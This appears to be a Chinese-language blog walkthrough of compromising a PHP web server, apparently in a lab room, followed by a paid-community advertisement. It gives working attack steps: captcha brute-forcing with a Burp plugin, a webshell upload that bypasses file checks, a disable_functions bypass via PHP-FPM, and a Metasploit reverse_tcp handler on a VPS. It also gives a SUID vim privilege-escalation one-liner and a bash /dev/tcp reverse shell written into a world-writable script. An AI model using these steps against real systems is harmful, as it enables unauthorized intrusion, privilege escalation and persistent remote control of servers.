1、后台验证码爆破
可以看到是有验证码的,也不存在验证码无限爆破漏洞只能使用burp插件验证码识别
1、首先是下载插件
captcha-killer-modified
2、获取验证码
获取一下,看看有没有获取上
3、开启python脚本
4、配置爆破
2、getshell 几种方式
1、用无影响的
直接访问上传的webshell
bypass disable_function
返回ret=127代表函数禁用需要bypasshttps://www.anquanke.com/post/id/208451
案例解析
文件上传点开启我们的 Burp, 进行拦截发包, 经过测试发现只能上传 .jpg 文件, 此时我们需要绕过后端过滤, 经过查询后发现修改文件幻数就可以绕过检测
我们来访问我们的文件可以发现获取到 SHELL 但是马上关闭, 我们查看房间, 了解到需要做一些规避
首先根据提示内容, 我们需要先找到对应服务器的路径, 在目录遍历时, 我们发现了一个 phpinfo() 在此我们可以找到对于服务器路径
思路打开
既然上传文件后无法长时间存活,那么就可以反弹shell,或者在能执行命令的这段时间反弹shell到msf上
就比如蚁剑我使用插件bypass后,虽然能执行命令,但不到一分钟就又不能执行了,这个时候我的想法就是把shell反弹到msf上,顺便还能跑一下自带的提权
运维人员会禁用 PHP 的一些 “危险” 函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。
这函数禁用的真死,用php木马反弹shell肯定是不行了
proc _ open ()已被禁用
只能上传msf木马反弹监听了在VPN上直接安装msf,省的搭建代理了而且是低权限只能先msf,再提权了
php-fpm是PHP内置的一种fast-cgi
php-fpm即php-Fastcgi Process Manager.php-fpm是 FastCGI 的实现,并提供了进程管理的功能。进程包含 master 进程和 worker 进程两种进程。master 进程只有一个,负责监听端口,接收来自 Web Server 的请求,而 worker 进程则一般有多个(具体数量根据实际需要配置),每个进程内部都嵌入了一个 PHP 解释器,是 PHP 代码真正执行的地方。
看到这里可以看到PHP-FPM找到tmp目录下的进行绕过.antproxy.php
/tmp/php-cgi-54.sock
有时候没成功,可能是php路径有问题通常在
`/usr/local/bin/php` 或 `/usr/bin/php`
vps搭建msf
安装msf
curl [https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb](https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb) > msfinstall && chmod 755 msfinstall && ./msfinstall
2.安装postgresql供msf使用
sudo apt install postgresql
3.测试查看数据库状态
systemctl status postgresql
设置数据开机自启动systemctl enable postgresql启动msfmsfconsole
设置监听器
msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost VPS-IPexploit or run
成功获取
suid 提权
查找拥有 suid 权限的文件
find / -perm /4000 2>/dev/null
vim 命令提权
https://gtfobins.github.io/gtfobins/vim/#suid
/usr/bin/vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
没有成功
旁门左道提权
计划任务提权查找 777 权限文件
find / -perm 777 -type f
写入反弹 shell ip 端口自行修改
echo "bash -i >& /dev/tcp/you-vps/10086 0>&1" >> /tmp/hackme.sh
如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放